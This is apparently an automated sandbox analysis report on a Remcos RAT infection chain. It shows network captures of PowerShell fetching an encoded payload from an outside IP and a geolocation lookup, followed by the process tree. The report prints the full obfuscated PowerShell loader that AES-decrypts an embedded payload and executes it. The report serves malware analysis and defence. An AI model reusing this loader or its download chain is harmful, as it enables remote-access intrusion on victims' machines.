                  Jul 26, 2024 13:08:56.914843082 CEST1236INData Raw: 06 4f 0b d1 be 96 3d 34 91 ab 2a 0a 56 dd 44 fc 6f df 03 c5 b9 32 29 42 6c d7 5a ba c1 4e ab b5 4a a6 c2 a2 98 ef 27 77 c6 b3 d1 ff 00 f0 c7 fd a9 48 d4 a9 80 9b 60 45 30 1f 0c 3e a7 c1 f4 d0 68 e6 54 49 5c b0 f4 95 50 cc be d5 df ae 07 8f 50 c6
                  Data Ascii: O=4*VDo2)BlZNJ'wH`E0>hTI\PP@"c4J22)Fpc,i^Hm4q`w12>8miUnq`f7m(/=EDZ}=>G7'BfHH8iV;B?{<i3nYvb}<
                  Jul 26, 2024 13:08:56.915738106 CEST776INData Raw: 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b 95 da c3 9e e7 f8 b1 d9 4b ad 3a 00 3e 7d 30 31 fc 69 61 85 16 38 c2 07 2d b8 ed 51 d2 b1 3d 0a 22 d3 b9 a2
                  Data Ascii: 4n%,yEa mVV]>e7]umCKK:>}01ia8-Q="O_!;jzEcn'J]h0T5xr]UC*K)\Foi2(3++GE/&8eU[:dW)V?L(D(E7,h$`c}f )*nsgS
                  Jul 26, 2024 13:08:56.915750980 CEST1236INData Raw: 77 28 e3 f2 cf 90 fd 9f d6 ce 9e 21 04 6b 65 06 ea ff 00 94 e6 f7 89 3f df 10 a4 c8 76 df 61 ce 07 b7 d3 7d b9 d3 6b a2 13 9d 33 2e e1 60 58 e0 7b 61 a3 fb 5d a5 78 d1 fc 96 50 5a 88 27 ae 7c eb 45 a5 3a 3d 3b 22 bb 30 26 d4 1e df 0c 2b cf a8 30
                  Data Ascii: w(!ke?va}k3.`X{a]xPZ'|E:=;"0&+0*=,GCtylaJl,c}SuFX'0p2KFKk"*sg#!;)|+MYe6]M}GBV)
                  Jul 26, 2024 13:08:56.915761948 CEST1236INData Raw: 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49 23 08 05 05 e6 c6 03 83 ed 4e 9a 37 3b 34 ee 6f b5 8c 28 fb 57 a7 dc a8 74 f2 82 45 f5 cf 39 e5 d9 65 08 a0 1a f5 77 19 67 81 9a 88 20 10 7d fb 60 6e
                  Data Ascii: ;7 B>9WSSHTs8rSSI#N7;4o(WtE9ewg }`n7jUZ"t;BxYNit!R[CH0/j9G]+B69<A_&M0gvfBEWJ%A(F ey{=^,<7Rg:)%Y
                  Jul 26, 2024 13:08:56.915774107 CEST1236INData Raw: 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1
                  Data Ascii: qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@BH5`CQx`,dd&<`iA*<i;As-#@+4e8L04
                  Jul 26, 2024 13:08:56.919548035 CEST1236INData Raw: c6 c2 f8 ab b2 3d ce 79 ef b3 97 0c ba a7 20 b2 aa 8b 0a 2c f5 c0 d3 d6 f8 52 ea 27 92 51 a8 68 8b 20 46 55 5a b1 de f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e
                  Data Ascii: =y ,R'Qh FUZ@t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.2249172192.3.176.174803240C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 13:08:58.938898087 CEST74OUTGET /60/WDER.txt HTTP/1.1
                  Host: 192.3.176.174
                  Connection: Keep-Alive
                  Jul 26, 2024 13:08:59.452513933 CEST1236INHTTP/1.1 200 OK
                  Date: Fri, 26 Jul 2024 11:08:59 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                  Last-Modified: Fri, 26 Jul 2024 02:37:01 GMT
                  ETag: "a1000-61e1d62d98767"
                  Accept-Ranges: bytes
                  Content-Length: 659456
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/plain
                  Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 [TRUNCATED]
                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABAAAgPk6Dk+goP05Db+QmPc5DW+AlP84DN+AiPY4DE+ggPE4DA9wfP43D89wePk3D09gcP02Dr9QaPc2De9AXPo1DZ9gUPo0DJ9gAPozDy8gKPIyDa8gEPowDC7g+OIvDq7g4OotDS7gyOIoD66gsOoqDi6gmOIpDK6QiOIkD65gcOomDi5wWOolDY5AUOgkDA4AOOAjDo4AIOghDQ4ACOEcD+3g9N4eDm3g3NYdDO3ghN4bD52wtNYbD02gsNAbDv2ApNIaDf2glNIZDR2giNkYDD2ggNAUD51AeNYXDp1gZN4VDb1AUNsUDJ1ASNcUDF1wQNEQD80gONkTD40gNNQTDy0QLNsSDm0AJNMSDi0AIN4RDc0wFNURDU0gENARDO0QDNYQDFzw/MsPDuzA7MkODlzA2MYNDTzwzMIMDAyQvMkLDsygqMcKDjyglMQJDRyQjMAED+xweMcHDqxAaMUGDhxAVMIFDPxwCM4DD8wQOMcDD1wAKMYCDjwQIM8BDSwAEM0ADLwQCAAEAkAYA4AAAA/A/Po/D3/w8PY+Dk/Q4P09DQ/gzPs8DH/wgP47Dt+wqPg6Dk+AoPs5DK+AiPU4DB9AdPInDe5AWOYlDV5AVOAlDP5wSOUkDD5gQOEkDA4wPO4jD64QOOUjDv4QLOwiDr4
                  Jul 26, 2024 13:08:59.452575922 CEST1236INData Raw: 67 4b 4f 6b 69 44 6f 34 41 4a 4f 4d 69 44 66 34 51 47 4f 63 68 44 57 34 51 46 4f 51 68 44 54 34 77 44 4f 34 67 44 4b 34 41 42 4f 49 67 44 42 34 41 77 4e 38 66 44 2b 33 67 2b 4e 6b 66 44 31 33 77 37 4e 30 65 44 73 33 77 36 4e 63 65 44 6d 33 67 34
                  Data Ascii: gKOkiDo4AJOMiDf4QGOchDW4QFOQhDT4wDO4gDK4ABOIgDB4AwN8fD+3g+NkfD13w7N0eDs3w6NceDm3g4NEeDd3w1NUdDU3A0NocDI3wxNYcDF3QgNsbD62AtNIbDx2AsN8aDu2gqNkaDl2wnN0ZDc2AmNcZDT2QjNsYDK2QiNUYDE2AQNoXD41wdNYXD11QcNAXDs1gZNQWDj1gYNEWDd1AXNgVDS1AUN8UDO1gSNkUDF0wPN
                  Jul 26, 2024 13:08:59.452613115 CEST1236INData Raw: 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44 62 37 51 32 4f 63 74 44
                  Data Ascii: xDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd
                  Jul 26, 2024 13:08:59.452651024 CEST1236INData Raw: 77 77 4f 49 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 55 53 44 6b 30 77 49 4e 49 53 44 68 30 41 49 4e 38 52 44 65 30 51 48 4e 77 52 44 62 30 67 47 4e 6b 52 44 59 30 77 46 4e 59 52 44 55 30 77 45 4e 49 52 44 52 30 41 45 4e 38 51 44 4e 30 67 43
                  Data Ascii: wwOIAAAAAOAFAOAAAANUSDk0wINISDh0AIN8RDe0QHNwRDb0gGNkRDY0wFNYRDU0wENIRDR0AEN8QDN0gCNkQDI0wBNYQDF0ABNMQDB0AwM8PD+zQ/MwPD7zg+MgPD2AAAAcBQBQDgOsrD66QuOgrD36gtOUrD06wsOIrDx6AsO8qDu6QrOwqDr6gqOkqDo6wpOYqDl6ApOMqDi6QoOAqDf6gnO0pDc6wmOopDZ6AmOcpDW6QlO
                  Jul 26, 2024 13:08:59.452687979 CEST1236INData Raw: 79 44 6a 38 51 49 50 38 78 44 64 38 77 47 50 6b 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44
                  Data Ascii: yDj8QIP8xDd8wGPkxDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv
                  Jul 26, 2024 13:08:59.452719927 CEST1236INData Raw: 41 33 50 6d 39 44 58 2f 49 31 50 49 39 6a 50 2f 49 7a 50 6e 38 54 48 2f 4d 78 50 4a 34 7a 2f 2b 51 75 50 4a 37 6a 70 2b 4d 6f 50 6f 35 6a 58 2b 51 6c 50 4b 35 44 51 2b 59 6a 50 73 34 6a 49 2b 67 68 50 4f 34 44 42 39 6f 66 50 77 33 6a 35 39 77 64
                  Data Ascii: A3Pm9DX/I1PI9jP/IzPn8TH/MxPJ4z/+QuPJ7jp+MoPo5jX+QlPK5DQ+YjPs4jI+ghPO4DB9ofPw3j59wdPS3Dy94bP12jj9YYPv1zS98APRzDl8gFPJxjO8cwO/vzO7MzOroz464rOcqzd6gmOZlDl4Y0Neejg24vNhPTFz8gM7LT3yssMGHzZxMTMCAD/wUJAAAAtAUAcAAAA/o6Pb+zj/83Pi9jW/AjPp7Ty+0rPx6Tn+EpP
                  Jul 26, 2024 13:08:59.452756882 CEST1236INData Raw: 33 44 6d 39 41 55 50 77 30 6a 4a 39 6b 52 50 50 30 44 41 38 59 4f 50 66 7a 44 32 38 45 4e 50 65 79 54 69 38 51 49 50 7a 78 54 61 38 73 45 50 76 77 54 48 38 73 77 4f 38 76 6a 67 36 6b 6e 4f 53 6c 7a 35 35 41 63 4f 62 59 6a 55 32 4d 54 4e 46 58 6a
                  Data Ascii: 3Dm9AUPw0jJ9kRPP0DA8YOPfzD28ENPeyTi8QIPzxTa8sEPvwTH8swO8vjg6knOSlz55AcObYjU2MTNFXja1kAN9QDM0gyM7LTxyIoMhJTWyEkMtEDYxEDMBDjdw4GAAAAbAQA4A8j8/s+Pr+DT/8hPc7T0+gsPk6jf+YnPX4zD98dPO3TI8QLPUyTZ80FPFxTO7I/OevDp7AkO1rD76MuONrTw6MqObqDk6coOxpzW6AiOVoDD
                  Jul 26, 2024 13:08:59.452788115 CEST1236INData Raw: 4d 58 4f 75 6c 54 61 35 34 56 4f 43 6c 54 4c 35 6b 51 4f 45 67 7a 2f 34 51 50 4f 59 6a 44 74 34 63 49 4f 43 69 54 66 34 49 48 4f 57 68 44 54 34 34 43 4f 70 67 44 4a 34 6b 78 4e 39 66 7a 38 33 67 39 4e 54 66 6a 7a 33 4d 38 4e 6e 65 54 6e 33 49 34
                  Data Ascii: MXOulTa54VOClTL5kQOEgz/4QPOYjDt4cIOCiTf4IHOWhDT44COpgDJ4kxN9fz83g9NTfjz3M8NneTn3I4N9dDe302NRdzR3wyNncjI3chNkbDw2srN2azq24oNqZjN2URN9XD+1MfNoXj11QbNmWjm1sYNyVzS1MUNsUDH0AONYTzu0YLNxSDX0cFNFRjP0gDNxQzBz0+MZPT0zU8MoOjnzs3MxNDXzs0MpMzHzIxMJIz7y4tM
                  Jul 26, 2024 13:08:59.452821970 CEST1236INData Raw: 4c 6a 6c 79 55 6e 4d 52 4a 6a 53 79 55 55 4d 56 48 54 47 77 6f 45 41 41 41 41 51 41 51 41 41 41 38 6a 6c 2f 45 35 50 79 35 6a 64 2b 55 6c 50 78 34 6a 4b 2b 55 53 50 34 79 44 7a 38 77 5a 4f 41 6c 6a 4e 79 63 72 4d 51 41 44 34 77 6f 4c 4d 64 43 41
                  Data Ascii: LjlyUnMRJjSyUUMVHTGwoEAAAAQAQAAA8jl/E5Py5jd+UlPx4jK+USP4yDz8wZOAljNycrMQAD4woLMdCAAAwCADAPAAAwPn/zy/I3PYlTG4YLOkhDY4wFOYhDV4AFOMhDS4QEOAhDP4gDOcUTYzQAAAAANAMA4AAAA2wjN4YDN2AjNsYDK2QiNgUDl1wRNYUDF1ARNMUDC1QQNAQDdzw/M4PD9zA/MsPD6zQ+MgPzVyAuMcLD2
                  Jul 26, 2024 13:08:59.452858925 CEST1236INData Raw: 77 41 4d 47 41 54 41 41 41 51 41 59 41 77 41 67 42 41 41 41 38 7a 2b 2f 55 2f 50 76 2f 6a 36 2f 51 2b 50 65 2f 44 32 2f 4d 39 50 4e 2f 6a 78 2f 45 38 50 38 2b 6a 74 2f 41 37 50 71 2b 54 70 2f 38 35 50 5a 2b 7a 6b 2f 34 34 50 49 2b 6a 67 2f 77 33
                  Data Ascii: wAMGATAAAQAYAwAgBAAA8z+/U/Pv/j6/Q+Pe/D2/M9PN/jx/E8P8+jt/A7Pq+Tp/85PZ+zk/44PI+jg/w3P39Tc/s2Pl9DY/o1PU9jT/k0PD9TP/czPy8DL/YyPg8zG/UxPP8TC/QgP+7D++IvPt7z5+EuPb7j1+AtPK7Dx+8rP56zs+0qPo6jo+wpPW6Tk+soPF6zf+onP05Tb+YmPg1z+9QBPIyDR8cDPwwjK8QCPTsj97E+O
                  Jul 26, 2024 13:08:59.457859993 CEST1236INData Raw: 70 6a 61 36 59 6d 4f 69 70 6a 55 36 30 6a 4f 72 6f 54 49 36 63 52 4f 37 6e 44 37 35 30 64 4f 57 6e 44 7a 35 49 63 4f 34 6d 6a 72 35 51 61 4f 78 6c 44 57 35 49 55 4f 70 6b 6a 49 35 59 52 4f 50 6b 44 43 34 34 4e 4f 55 6a 54 7a 34 59 4d 4f 2f 69 44
                  Data Ascii: pja6YmOipjU60jOroTI6cRO7nD750dOWnDz5IcO4mjr5QaOxlDW5IUOpkjI5YROPkDC44NOUjTz4YMO/iDu4QIO6hzc4sDO0gjF3o/NpDAAAAHACAIAAAQOikzG58QOIgT/4YPOujD34wMOFjTu4ILOkiTn4UJODizc4wGOghTW4sEOEhDP4oCOagzE4cAOAcj83s+NjfT038xNScDB2EvNibjr2AqNPaje2oiNdYzD1wfNtXDq


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.2249174178.237.33.50803384C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 13:09:03.401309013 CEST71OUTGET /json.gp HTTP/1.1
                  Host: geoplugin.net
                  Cache-Control: no-cache
                  Jul 26, 2024 13:09:04.026494980 CEST1170INHTTP/1.1 200 OK
                  date: Fri, 26 Jul 2024 11:09:03 GMT
                  server: Apache
                  content-length: 962
                  content-type: application/json; charset=utf-8
                  cache-control: public, max-age=300
                  access-control-allow-origin: *
                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                  Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:07:08:22
                  Start date:26/07/2024
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Imagebase:0x13f990000
                  File size:28'253'536 bytes
                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:4
                  Start time:07:08:45
                  Start date:26/07/2024
                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                  Imagebase:0x13f400000
                  File size:1'423'704 bytes
                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:8
                  Start time:07:08:52
                  Start date:26/07/2024
                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Imagebase:0x400000
                  File size:543'304 bytes
                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:9
                  Start time:07:08:53
                  Start date:26/07/2024
                  Path:C:\Windows\SysWOW64\wscript.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS"
                  Imagebase:0x940000
                  File size:141'824 bytes
                  MD5 hash:979D74799EA6C8B8167869A68DF5204A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:10
                  Start time:07:08:54
                  Start date:26/07/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
                  Imagebase:0x140000
                  File size:427'008 bytes
                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.437191072.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:12
                  Start time:07:08:59
                  Start date:26/07/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Imagebase:0xac0000
                  File size:64'704 bytes
                  MD5 hash:8FE9545E9F72E460723F484C304314AD
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
